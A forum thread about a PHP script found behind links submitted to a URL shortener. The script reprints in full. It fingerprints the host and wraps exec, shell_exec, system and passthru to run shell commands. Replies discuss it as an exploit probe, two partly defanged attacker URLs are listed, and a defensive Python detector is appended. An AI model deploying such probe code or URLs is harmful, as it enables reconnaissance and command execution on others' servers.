Thread: What is this?!

  1. #1
    Kovich, Community Guardian

    What is this?!

    Someone put the following URL into my URL Shortener:
    I do not recommend clicking this link:
    http:// ta-photo .com /templates/Varages/mild.txt???

    Anyway, I visited it and it showed me this:

    PHP Code:
    <?php
    //CADOTUNJI Response
    // Collect basic facts about the host the script runs on.
    $pwd1 = @getcwd();
    $un = @php_uname();
    $os = @PHP_OS;
    $id1 = ex("id");if (empty($id1)) {$id1 = @get_current_user();}
    $sof1 = @getenv("SERVER_SOFTWARE");
    $php1 = @phpversion();
    $name1 = $_SERVER['SERVER_NAME'];
    $ip1 = @gethostbyname($SERVER_ADDR);
    $free1 = @diskfreespace($pwd1);
    $all1 = @disk_total_space($pwd1);
    $used = ConvertBytes($all1-$free1);
    $free = ConvertBytes(@diskfreespace($pwd1));if (!$free) {$free = 0;}
    $all = ConvertBytes(@disk_total_space($pwd1));if (!$all) {$all = 0;}
    if (@is_writable($pwd1)) {$perm = "[W]";} else {$perm = "[R]";}
    if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") {$sf = "ON";} else {$sf = "OFF";}

    // Print the collected values, starting with the CADOTUNJI marker and the safe_mode state.
    echo "CADOTUNJI".$sf."<br>";
    echo "uname -a: $un<br>";
    echo "os: $os<br>";
    echo "id: $id1<br>";
    echo "pwd: $pwd1<br>";
    echo "php: $php1<br>";
    echo "software: $sof1<br>";
    echo "srvip: $ip1<br>";
    echo "srvname: $name1<br>";
    echo "free: $free<br>";
    echo "used: $used<br>";
    echo "total: $all $perm<br>";

    // Format a byte count as b/Kb/Mb/Gb, chosen by the number of digits.
    function ConvertBytes($number) {
        $len = strlen($number);
        if($len < 4) { return sprintf("%d b", $number); }
        if($len >= 4 && $len <=6) { return sprintf("%0.2f Kb", $number/1024); }
        if($len >= 7 && $len <=9) { return sprintf("%0.2f Mb", $number/1024/1024); }
        return sprintf("%0.2f Gb", $number/1024/1024/1024);
    }

    // Run a command through the first available of exec, shell_exec, system, passthru, popen.
    function ex($cfe) {
        $res = '';
        if (!empty($cfe)) {
            if(function_exists('exec')) {
                @exec($cfe,$res);
                $res = join("\n",$res);
            } elseif(function_exists('shell_exec')) {
                $res = @shell_exec($cfe);
            } elseif(function_exists('system')) {
                @ob_start();
                @system($cfe);
                $res = @ob_get_contents();
                @ob_end_clean();
            } elseif(function_exists('passthru')) {
                @ob_start();
                @passthru($cfe);
                $res = @ob_get_contents();
                @ob_end_clean();
            } elseif(@is_resource($f = @popen($cfe,"r"))) {
                $res = "";
                while(!@feof($f)) { $res .= @fread($f,1024); }
                @pclose($f);
            } else { $res = "NULL"; }
        }
        return $res;
    }

    ?>
    Is this some sort of exploit? Are they seeking vulnerabilities in my server? To be honest, I'm quite concerned.

    I removed it from the database. And I also found this, and removed it as well:
    http:// www. koreadefence .net/data/shirohige/zfxid.txt??

  2. #2
    fling33, Unknown Net Builder
    It looks like some sort of PHP exploit, but don't worry about it, because if you saw that code that means it didn't work. It's not supposed to show you the source code. If you do a search for "CADOTUNJI" you will see a couple hacked websites in the search results.

  3. #3
    TopDogger, Über Hund
    It displays the source code because the file name is mild.txt. With the TXT extension, it never gets run through the PHP parser.

    Perhaps the intention is to provide the source code to someone.

  4. #4
    fling33, Unknown Net Builder
    Good point. It is a text file so it is harmless in that it didn't run. But it may be harmful in that if he was using a URL shortener he is probably showing this code to others, and if it's malicious code that could be bad.
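
An added example, not part of the thread and not any poster's code: one way the operator of a URL shortener could screen for what post #1 describes, namely a submitted link to a `.txt`-style file padded with trailing `?` characters, and fetched text that is really PHP source combining host fingerprinting with command execution. The extension list, function names and sample data are assumptions constructed for illustration; the PHP function names are the ones called in the quoted script.

```python
import re
from urllib.parse import urlsplit

# Assumed list: extensions a web server hands back as-is instead of executing.
STATIC_EXT = (".txt", ".gif", ".jpg", ".jpeg", ".png", ".dat")
# PHP functions called by the script quoted in post #1.
FINGERPRINT_CALLS = {"php_uname", "getcwd", "phpversion", "get_current_user"}
EXEC_CALLS = {"exec", "shell_exec", "system", "passthru", "popen"}


def suspicious_submission(url):
    """True for an http(s) URL to a static-extension file followed only by '?' padding."""
    url = re.sub(r"\s+", "", url)  # undo defanging spaces such as "http:// host .com"
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or parts.fragment:
        return False
    if not parts.path.lower().endswith(STATIC_EXT):
        return False
    # urlsplit keeps everything after the first '?' as the query: "???" -> "??"
    return "?" in url and parts.query.strip("?") == ""


def classify_payload(body):
    """Report which traits of a PHP probe script appear in fetched text."""
    called = set(re.findall(r"\b([A-Za-z_]\w*)\s*\(", body))
    return {
        "php_open_tag": "<?php" in body.lower(),
        "fingerprint": sorted(called & FINGERPRINT_CALLS),
        "command_exec": sorted(called & EXEC_CALLS),
    }


def is_probe_script(body):
    """All three traits together: PHP source, host fingerprinting, command execution."""
    traits = classify_payload(body)
    return bool(traits["php_open_tag"] and traits["fingerprint"] and traits["command_exec"])


# Constructed sample data (not taken from a real log or database).
SUBMITTED = [
    "http://files.example.test/templates/x/probe.txt???",
    "http:// www. example .test/data/a/b.txt??",
    "http://docs.example.test/readme.txt",
    "http://docs.example.test/notes.txt?download=1",
]
SAMPLE_BODY = "<?php $un = @php_uname(); $pwd1 = @getcwd(); @exec($cfe, $res); ?>"

if __name__ == "__main__":
    for u in SUBMITTED:
        print(suspicious_submission(u), u)
    print(classify_payload(SAMPLE_BODY), is_probe_script(SAMPLE_BODY))
```

Both checks are heuristics: a match is a reason to quarantine the entry and review it, not proof of compromise.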
